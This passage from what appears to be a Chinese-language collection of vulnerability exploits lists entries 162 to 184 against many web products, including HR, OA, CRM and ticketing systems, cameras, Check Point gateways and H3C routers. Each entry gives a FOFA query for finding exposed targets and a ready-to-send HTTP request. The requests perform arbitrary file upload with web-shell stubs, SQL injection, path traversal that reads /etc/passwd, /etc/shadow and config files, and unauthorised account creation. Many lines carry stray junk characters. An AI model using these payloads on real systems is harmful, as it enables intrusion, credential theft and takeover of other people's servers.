http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"( N4 _( l4 [$ a! |! y) L
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">2 ^) f5 ?( D- d& W. h: S, e, R7 Z
<soap:Body>: Z% Q! |9 v/ _$ ^0 |
<UploadResume xmlns="http://tempuri.org/">
1 _8 j, J1 _' }( R9 ?0 U<ip>1</ip>
* ?, ^: G* c' |. ^6 W* Y+ L# x<fileName>../../../../dizxdell.aspx</fileName>6 C3 P& y' p, f9 D! C
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
9 p3 q ~ Z7 ]" j, e6 X<tag>3</tag> {" ~. \$ Q. B9 B* G& F4 J+ r6 x
</UploadResume>! \. e/ O+ |. X" C
</soap:Body>! ?$ l& x+ ~+ H) l
</soap:Envelope>
9 k- p- \0 _% P0 n1 L* E5 D7 n
9 C0 J# m6 ^) i$ t1 C& |& g7 R* a9 T& b. Q6 l
http://x.x.x.x/dizxdell.aspx
2 O+ W5 [: d" r0 b! F
1 k& n. M& i% A162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传% }) `- R0 G% v/ L
FOFA: app="和丰山海-数字标牌"
' h6 g4 ~9 H- LPOST /QH.aspx HTTP/1.1
& c" R! M$ r( j$ {Host: x.x.x.x
$ j3 X N( G' `" uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" k+ X" J4 S) h8 l/ q& ~, Q
Connection: close
) r4 q6 W0 |4 C0 r1 I2 SContent-Length: 583" V a3 V+ C: J s0 @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
' e6 A1 T- f `4 D& R: F% V4 M$ }Accept-Encoding: gzip3 m' |4 o) a$ s e
+ K3 z8 K; r: J+ Z------WebKitFormBoundaryeegvclmyurlotuey' z7 w' _* u9 L# G! F* w* a
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"* H! z; @$ m! B4 O9 [& U. L
Content-Type: application/octet-stream9 b$ ~# ~, u' R$ p% e
r7 c7 P" l5 s<% response.write("ujidwqfuuqjalgkvrpqy") %>" O6 U J% @, Z, u& p+ r D8 q7 @
------WebKitFormBoundaryeegvclmyurlotuey2 j8 N6 `5 o% w; ]$ W/ v
Content-Disposition: form-data; name="action"! e! B8 `, o$ y
6 Z3 r% N8 C+ [; d2 I# Q- ]9 ~6 _
upload
* |' d" ?3 x/ H" e, o" }3 |------WebKitFormBoundaryeegvclmyurlotuey
; V6 r1 Y) ~6 n$ K6 e$ g6 l4 mContent-Disposition: form-data; name="responderId"
1 \! m$ |3 ? [# `; r1 [$ I; \& }8 x6 L- g" @
ResourceNewResponder
9 N6 {8 ?8 M6 \# x4 C( S9 F------WebKitFormBoundaryeegvclmyurlotuey
9 k* T6 x1 d5 _' z( F1 d! SContent-Disposition: form-data; name="remotePath"
5 ^1 i" y8 I& P0 k! A3 F7 F V: v4 x- ]
/opt/resources6 u8 W( r' C9 B4 ~. a% _
------WebKitFormBoundaryeegvclmyurlotuey--' y% S! }; ]# H; ]( a
5 b& k* j3 y& l: T
) E* G1 V/ L3 K5 [http://x.x.x.x/opt/resources/kjuhitjgk.aspx
' L j4 [# B! a: C2 F: R# m1 }6 K8 N5 e, ~/ t' J9 i7 f. @
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
( q3 d: K0 T6 H: u1 N& y5 rFOFA: icon_hash="-795291075"
: c' P8 j5 @) |2 w) H- Q8 }POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1 s; K: `9 J4 n. S0 r
Host: x.x.x.x
+ M* m& |- N, o- ?8 D5 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
4 K9 \; \4 E4 z; h' z3 YConnection: close- Z; _1 Q7 i; U6 }* z
Content-Length: 293
* \, k: t4 H7 d7 _0 NAccept: */*
v9 Y1 P6 \8 ]Accept-Encoding: gzip, deflate
# I q( P3 W& J2 t- J; l7 YAccept-Language: zh-CN,zh;q=0.9
- c& ~. U8 Q! I4 J/ h; MContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod; _5 G% d/ C' r0 ?3 x
9 L* W+ N% S' J+ w8 N7 U! f# d------iiqvnofupvhdyrcoqyuujyetjvqgocod2 |& V2 P$ s2 Z
Content-Disposition: form-data; name="name"
8 a/ m' T1 j- {9 V! G. H
7 }7 i. D/ ]7 n: B1.php c1 J; `: E. F4 e6 q, t/ o8 g
------iiqvnofupvhdyrcoqyuujyetjvqgocod3 w" t+ c9 s3 V+ l
Content-Disposition: form-data; name="upfile"; filename="1.php"
: f4 ]1 k7 m1 c1 f j; rContent-Type: image/jpeg% R* l! F) }3 J* S8 |& j1 n
+ M9 f: T- l. m4 ^, {1 |. N: {rvjhvbhwwuooyiioxega
! V. ^3 Z8 q. {2 S1 t4 L F------iiqvnofupvhdyrcoqyuujyetjvqgocod--# x4 F2 n% \+ `1 ~
, a! {9 T6 h6 J( J2 K/ }
7 r2 f/ q/ @# P& v164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ }$ v) ^1 S0 a& q3 C8 B; K
FOFA: title="智慧综合管理平台登入"
. k# e2 X" ], }- j8 k4 S: ~* F0 @POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
- w6 Y$ A, j' X1 f. VHost: x.x.x.x
; k# c& w5 t* t, B. p4 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0: O) d; S* h4 p
Content-Length: 288+ h$ Z: X2 x( O
Accept: application/json, text/javascript, */*; q=0.01
( H! b, [! {! U: Z$ E O2 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
4 c; O& M# s0 E6 E2 eConnection: close0 q1 c/ _+ B: |% G
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
' J/ y2 H$ t: z: e% UX-Requested-With: XMLHttpRequest R! H6 m h4 ]
Accept-Encoding: gzip
I/ r" p! J; ^3 n/ P/ L4 F @
N2 J0 Q& ~: h7 V3 c4 ^: E) a------dqdaieopnozbkapjacdbdthlvtlyl0 R+ _4 @* [$ `3 C& I3 S
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
4 D3 u8 m2 v( xContent-Type: image/jpeg
0 u% Y* Q+ k! m! ~9 S+ j# a- E: g$ _2 [$ P9 U
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>; @" W# `8 ^0 ~- ?# p i
------dqdaieopnozbkapjacdbdthlvtlyl--
/ L* ]8 x. [0 d2 H
- \' r( @ g3 T$ f: Q9 U6 f
! y: z6 n- d$ U& mhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx5 {4 D" l& l6 Y, ~+ f+ @
% W. z0 d4 P. ~0 |1 J
165. OrangeHRM 3.3.3 SQL 注入
7 j$ b, F& w# H+ a; V; o6 dCVE-2024-36428
3 i6 A; B5 t0 a( H- uFOFA: app="OrangeHRM-产品"
. l" a( n/ V) O9 R- v- rURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
$ z8 j! m- f% X' C- k1 D/ r
! j0 O* Q8 j$ Q# @5 ]. u _3 J+ b0 o( {+ Y$ Z) m+ c( i: U
166. 中成科信票务管理平台SeatMapHandler SQL注入
/ l& R' ]- }- J9 A' JFOFA:body="技术支持:北京中成科信科技发展有限公司"
6 ?/ r( t' g$ J/ LPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1. \2 _) Z P( Z+ B6 X/ S( d j
Host:* f: B- E( r, f) s% d H' H
Pragma: no-cache8 I* _9 o2 G3 m; W5 U( A
Cache-Control: no-cache/ ~* K+ o: t6 D" f) y
Upgrade-Insecure-Requests: 1: ^) C+ C0 x1 O# W% Q5 o' H" B( ~: e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
& Z6 a5 x5 g& Q* Y6 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 t8 H _- `6 t1 [4 iAccept-Encoding: gzip, deflate
/ m' y6 \" L% m6 r6 n- X7 z% P, HAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 D# U( i, R+ U- \, `Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 h+ Y" P8 r5 O4 ~$ X
Connection: close) N s$ z8 \" N* p0 \
Content-Type: application/x-www-form-urlencoded r' u/ w$ u, ?: z& [9 A8 A
Content-Length: 89# y8 q) [$ z9 e0 Z7 A# T0 U. p
7 O! v! E9 x# x* E2 ]3 ]Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE2 d* x& z8 C/ ]' Z
0 \/ u7 v2 B: f! J* d( A H0 a) G% B9 A
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 u, E4 m2 T0 Q0 Y* n S; \; i {0 n3 H. q
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"5 y$ a' y- E+ R) \' l" Q
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1% l4 {) E: |' G$ Z( e$ N p
Host:1 {5 [ _$ T) r4 d) y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, t& ]* U( i! T: c/ G! x
Content-Type: application/x-www-form-urlencoded
" m/ Z0 `9 ^' v& _8 a" rAccept-Encoding: gzip, deflate
' [5 k. i; x& ?: \. CAccept: */* L( ~/ ?; T, {/ L x1 @+ F
Connection: keep-alive
2 J& t0 Y1 B, I* N ~
. J8 E" T0 |" Z8 F9 K' C
8 K) T' V) b e168. 宏景EHR OutputCode 任意文件读取 x W' b+ X. G: m7 v
FOFA:app="HJSOFT-HCM"* @8 X, r/ |0 ~# T$ J3 V+ T
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1, b* Q5 _ j. ^$ C+ g; ~( f9 q
Host: your-ip
2 s. B$ ]4 A! n( q( @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36: ^; |, V8 A1 g3 g" }- s
Content-Type: application/x-www-form-urlencoded: H8 p. N9 P' ?1 H* G- D
Connection: close
( S( z8 n L7 Q0 c, W
) P# d ~+ ~0 v2 A
4 X: t9 ~9 J$ i4 q- m& k2 `
. }) g& n1 N6 o# P6 |169. 宏景EHR downlawbase SQL注入/ U. q7 j( T; u" A& j2 |, n
FOFA:app="HJSOFT-HCM"4 D7 B H$ `+ C. p' ~
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.16 V2 T7 O0 H' k4 [9 }( U, D
Host: your-ip# n, \1 `* T6 s% L g# F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 e& J X9 ~' ~4 LAccept: */*
9 h; Z# S. s: ?% k$ j9 aAccept-Encoding: gzip, deflate! Y! Q( \/ v' o7 [1 f. e: Z* F# S# [( L; |
Connection: close! n5 e) P( t& ^! o& w; P. r8 K
5 j6 J! _& h7 [4 C
; G3 w% t" W# h. `3 K/ B' j
" ]; i- Z) x: m# i, `170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 z% p5 Z" j& t5 l5 Q6 k- XFOFA:body="/general/sys/hjaxmanage.js"
) E2 c# u9 c5 T* s7 {; Y" D8 h2 nPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.13 J5 s: |2 \1 ]+ ~
Host: balalanengliang
6 ]' ? u- I) k! lUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- I7 ^; n# F/ Z' F& A, w% W, PContent-Type: application/x-www-form-urlencoded
# v. d' R! n$ T5 F0 V0 u- f* @* U: R8 w) d5 e' g
filename=../webapps/ROOT/WEB-INF/web.xml1 }, Q1 a9 Y. h F, `
8 t" E9 {& g! D8 x
: i* i9 V' ]9 d1 g c
171. 通天星CMSV6车载定位监控平台 SQL注入4 G' W( R0 z5 L/ P
FOFA:body="/808gps/"
6 [" ~8 [' T' _/ p- Q9 rGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.13 P# E! Z5 R0 G6 K' q* J5 f
Host: your-ip: v6 s( H5 x& S3 u& [. R6 G# G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
5 g; J0 M/ V+ P' R- W( ~5 U- |Accept: */*
. C1 A0 L+ A! GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ U5 O; M' \( l6 V% m( ~( lAccept-Encoding: gzip, deflate
$ r2 Q/ y7 \) O' [ x4 fConnection: close
1 `( W6 B7 U) K t) H) J
# x: ~* I; ]. C2 z9 p/ L+ b/ F* K c) H' {
5 x+ \2 ^6 [ T& g% k
172. DT-高清车牌识别摄像机任意文件读取
4 O# e( U+ b! ?4 IFOFA:app="DT-高清车牌识别摄像机"
- g/ `2 m. _! W6 W9 G) QGET /../../../../etc/passwd HTTP/1.11 x" T% k, g: K/ w% O
Host: your-ip! m* k/ J: ?; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ w( a. [7 I# Z- ZAccept-Encoding: gzip, deflate# i& N6 h2 h/ u& O0 a. h, ~1 {
Accept: */*
+ }( R! T# {1 }; ~7 n: k% VConnection: keep-alive9 V. G% w0 L9 W, `3 E7 H8 U, Q
4 w8 t8 L( Y N7 g& }8 y
) \: Q7 \& h! c
, j# P3 ^3 W5 i/ i; z: \
173. Check Point 安全网关任意文件读取
, m8 Y# W% D( O3 j3 RCVE-2024-24919
% \ M/ _' |' u+ zFOFA:app="Check_Point-SSL-Network-Extender"3 r7 A# |0 D9 _4 q, L/ o
POST /clients/MyCRL HTTP/1.1( I7 S6 W7 k* B9 H9 g
Host: your-ip+ o( @$ x! p9 L q/ L, U0 A
Content-Type: application/x-www-form-urlencoded
- H) q V/ M' J! o1 q
E k- x5 \' F z {. h V" g5 oaCSHELL/../../../../../../../etc/shadow7 U# ~! Y. {* w+ O* e
# G/ I2 `) s+ w! [3 e
' B, w6 Q- p M" s4 J( s
8 C u. X; O& E$ G- Q, s# e174. 金和OA C6 FileDownLoad.aspx 任意文件读取
( E6 R) R/ T& I' zFOFA:app="金和网络-金和OA"
' V0 r* `% I0 A& p+ I( v9 VGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.12 }' g( Q$ n% S7 e! E4 j% p
Host: your-ip
: N6 p3 _" h: W" E' wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 }( z& w1 E$ C8 K7 L+ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ~/ W' r8 Y# Z/ H8 FAccept-Encoding: gzip, deflate, br) t7 a6 u9 q' {- s1 r1 N8 _
Accept-Language: zh-CN,zh;q=0.91 d& ]: V6 Q$ d( m; J" s$ K* T
Connection: close/ h( q5 A" L/ V3 d- O3 j
# a+ {, g/ @6 n; {! s& ^/ ~ v: f
" `1 k' }1 T/ X/ i& P8 {$ Y
/ U0 }* y4 a1 j+ Q% X9 z: y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ I! W" a) h1 ?* o
FOFA:app="金和网络-金和OA"
; ]3 X$ ^4 [0 ?1 X( o( A6 m( _GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1: y5 ?" \- Q. |7 e% ]. L( \
Host:, Z- U3 h) T! l3 _4 D5 S( m: i
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 M2 N! ?/ t# ?) w; A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 p9 ]' k) i- n9 H) e5 ^& t4 {5 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 \! N2 K+ k9 j3 vAccept-Encoding: gzip, deflate
0 G# h% m4 | k4 ]" P+ z# ^, EConnection: close7 ?* x7 U% q. ~0 Q+ M& r0 g
Upgrade-Insecure-Requests: 1
' n* ]% U! ?" u' v; D" z/ v7 Z4 F! |1 ]$ ~) Y
" C( q) l, p5 f) P3 _
176. 电信网关配置管理系统 rewrite.php 文件上传, b3 h5 A9 c: ]7 ^9 b3 r
FOFA:body="img/login_bg3.png" && body="系统登录"
8 B+ X; w+ w0 A) b; F. P, ]3 w& xPOST /manager/teletext/material/rewrite.php HTTP/1.15 w" p. H# ^3 t" I# Y& V& L
Host: your-ip
$ ^! K4 J$ t2 P. E6 T- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.03 l1 p6 h# P' _! h3 l: j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT1 E6 m9 `( _- `" b3 j \4 R4 @
Connection: close, O5 k4 @, ?# R/ K* c" v0 c, H$ ?
" [( b/ I3 @5 M% y------WebKitFormBoundaryOKldnDPT
" g$ }( U/ |, u' m( E& @Content-Disposition: form-data; name="tmp_name"; filename="test.php"! |0 ?1 A2 J3 M, n
Content-Type: image/png
) A- ?( D- j9 Y2 x ~, S
7 i% l U$ o7 V/ J9 l1 d3 d<?php system("cat /etc/passwd");unlink(__FILE__);?>
( h( n3 J- ~4 |' P6 |: ^------WebKitFormBoundaryOKldnDPT
4 f! \/ Q+ i/ N. NContent-Disposition: form-data; name="uploadtime"' g! E8 [* `: B+ S. T( i
* w% `$ o0 o% }
3 u7 p |8 a7 [( x" {
------WebKitFormBoundaryOKldnDPT--! E8 t0 U5 d0 j5 g7 K
2 G2 o) i/ B" q
N: S+ |0 O/ @( t2 {
" m0 L: ]9 o5 n/ |8 P6 F
177. H3C路由器敏感信息泄露, r* n+ b: Q$ f9 u! k6 J' i: v4 m
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
) J* ]8 s& }% b, l8 u3 y/userLogin.asp/../actionpolicy_status/../M60.cfg8 P* K) X/ H. C: D
/userLogin.asp/../actionpolicy_status/../GR8300.cfg- h [! Y3 j3 F1 e0 s( \
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/ F8 y% ^. V/ m% }/userLogin.asp/../actionpolicy_status/../GR3200.cfg
9 j1 N* `& V( M1 _) ]/userLogin.asp/../actionpolicy_status/../GR2200.cfg* E9 j% o* u/ K) ]" ~/ r
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg% L( g9 Z4 {* ^* s
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* N4 Y, a: A& {- {! G
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg- V6 |3 C7 m( F9 @: I4 r
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg) Q. }( v+ j+ F2 |
/userLogin.asp/../actionpolicy_status/../ER5200.cfg0 {7 m. d. n0 ~, m
/userLogin.asp/../actionpolicy_status/../ER5100.cfg# e" r- ~9 W2 b) ?" f
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg8 `) j# f# c, ~/ M4 R. w/ j, z
/userLogin.asp/../actionpolicy_status/../ER3260.cfg1 _ p! V" J, J* b
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
2 V" K3 z+ x5 S+ m! B% y/userLogin.asp/../actionpolicy_status/../ER3200.cfg
1 o; t1 U6 ?4 K' }( c2 p# z/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg& Z4 u, R/ D- K/ X F
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
* ^7 d6 s/ j! W* V4 L8 ?9 l4 S/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
1 Z- C* J9 A+ J9 o. Y" R" h/userLogin.asp/../actionpolicy_status/../ER3100.cfg; E* Q8 t o `) E( R/ q
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
' b- B0 A7 P4 _) U9 E" B: G% f9 {# b5 F8 n% [
8 i, ~( P' N; z3 ^4 X# P
178. H3C校园网自助服务系统-flexfileupload-任意文件上传) }' Y) p5 O$ i, D# D
FOFA:header="/selfservice"
+ F3 {% V9 n8 J5 n( MPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
* a- [2 X+ ^# E9 BHost:1 m7 x R) u" m0 p# b1 \0 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, H C' E! F0 f/ b1 W7 I3 h/ |Content-Length: 252 N: P: Y0 Y( P4 x5 s, P9 k
Accept-Encoding: gzip, deflate
' q2 ~% F7 g- m5 R8 nConnection: close
+ y) l, C& }+ c4 Y8 ^Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
! o( }, d5 ^: M( F) x9 T% c- j-----------------aqutkea7vvanpqy3rh2l
0 X+ c5 n/ N. bContent-Disposition: form-data; name="12234.txt"; filename="12234"
% t, l0 _* U$ t7 [Content-Type: application/octet-stream
" @) [ I- x1 lContent-Length: 255: N8 U. ^: E# e3 S4 r
1 R) R6 f! u/ r' m* o9 e5 D/ s
12234
- I# y9 C; Q6 J, E1 H-----------------aqutkea7vvanpqy3rh2l--
$ z+ r2 R9 o& b. z) L i$ S% x$ f' A$ g0 `* T
T. p& ^" u' r% Z3 F2 V9 }- oGET /imc/primepush/%2e%2e/flex/12234.txt
" X9 i$ a% i1 k: f8 ?/ H2 y* K! i/ t5 I2 c
# s E- U# [1 b9 i% G179. 建文工程管理系统存在任意文件读取
0 \* Y! Q+ L4 g& cPOST /Common/DownLoad2.aspx HTTP/1.1
( h( @; S2 A% r7 Y1 E& fHost: {{Hostname}}
2 w6 x+ [: x e% R% a2 k, O6 _Content-Type: application/x-www-form-urlencoded L+ H* _$ h" Q1 ^3 e
User-Agent: Mozilla/5.01 K% ^5 O4 W i7 Z" O6 P& j, q* U
/ G ^4 M/ a0 \1 J
path=../log4net.config&Name=1 P2 J& {/ S- \0 b5 ^# Z4 r, @
5 O6 s) A5 h0 s# @
( n+ x5 l$ K5 x$ D180. 帮管客 CRM jiliyu SQL注入" @1 X# Z, K! @
FOFA:app="帮管客-CRM"
; Q8 _! o3 s6 I ~2 q. X: YGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.13 F7 c0 R% `9 z+ p8 ~4 {8 c
Host: your-ip
- |: m s# X! z _+ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. i1 @* @. R( {( ~4 [+ G# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 J" ~! C7 \% g! l/ Q$ J+ q: I' J8 A0 x
Accept-Encoding: gzip, deflate: }1 X0 ]9 w& h: [+ f( c
Accept-Language: zh-CN,zh;q=0.94 @ Y& d8 m& i m
Connection: close
# `% e) @; X' b) |6 a! \$ i& n
; A1 R; p2 r& E- ^; [
3 K$ g3 e5 R7 d7 R7 q! J9 m181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# e8 T2 S0 E& \8 LFOFA:"PDCA/js/_publicCom.js"
' s5 Q6 _( u* EPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1; \% ?+ O b" @: G- n$ Q+ F, k
Host: your-ip; o( ?- I! G2 |4 j9 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
5 g1 l4 F1 c; r6 }3 K- w7 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 p1 Q3 e4 i. H9 K
Accept-Encoding: gzip, deflate, br2 \% V# {* @$ Y; T* f5 S0 ~) X0 Z* R. N
Accept-Language: zh-CN,zh;q=0.9
0 |" @6 {! W- wConnection: close: |; }; [5 R' m* n9 q; s) L1 e
Content-Type: application/x-www-form-urlencoded3 [* D& Q0 N6 B5 E, j& B/ b7 k
# z: ~ i" P* l1 h2 h! L' N# z( @5 B9 u6 j1 y8 I
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 |6 l1 B# {/ Q' T3 T' j# T" u1 \# |6 T# L R) b( ~7 Q
& X" F7 u$ w- G" q182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 P7 } B. u+ y7 |
FOFA:"PDCA/js/_publicCom.js") w, x9 f+ t1 n$ N
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.15 R% `* N8 g4 v4 p' g6 ]1 d
Host: your-ip$ v8 {1 l3 r+ {3 ]3 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 e8 s% J4 s# L1 z, W; \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, h9 |5 Z; h- v5 \# X
Accept-Encoding: gzip, deflate, br
7 _) ]" q/ c( r" K: sAccept-Language: zh-CN,zh;q=0.9) d5 ]% R2 Y8 X4 ]0 |
Connection: close
. u/ ^: D9 f- [* h* _Content-Type: application/x-www-form-urlencoded
0 y" P6 K- o/ l, ^4 P
5 a0 e/ O4 d3 _) p" v0 M
& |9 K8 J8 |; B S7 kusername=test1234&pwd=test1234&savedays=1( d( B3 u- k0 ]3 B' m5 W4 ]3 r+ J3 ?
; Y/ O i. L9 }! ]+ [) j+ w+ T. `0 V+ I. k+ O7 ]6 n) H4 d
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( {& x5 X- X8 gFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"8 l3 U4 k3 w* K6 ]
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
* U' e- h( b, I# J) D/ @Host: your-ip; [% V4 M; [- P
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
- r4 C+ P, |. D( s) m8 IAccept-Charset: utf-84 y8 u- G7 z& e! g8 |
Accept-Encoding: gzip, deflate' H' z1 n4 |$ [
Connection: close
5 W4 C$ s9 @+ o6 K% w1 l9 I9 Y! ]6 [' }2 ~
, ] U6 J: [! K184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 R! Q6 Q" l. A: s
FOFA:server="SunFull-Webs"
9 n3 h8 I1 w2 cPOST /soap/AddUser HTTP/1.1
" c9 y, |8 d3 x1 ~' l* \) r& c, FHost: your-ip( x6 r' r( V5 M& U
Accept-Encoding: gzip, deflate
$ A6 w. }- i# ~. M. v; U9 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' G$ G* ]* i9 n$ w: ^Accept: application/xml, text/xml, */*; q=0.013 s" o' s8 G) R K
Content-Type: text/xml; charset=utf-86 Z% ~7 l1 r4 C* S! S- ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; W1 R$ `* R2 o- ~# f4 {. xX-Requested-With: XMLHttpRequest% p% a( h! u% f* J% K
) Q3 ~) A% V7 ]: i- I; f5 G& Z
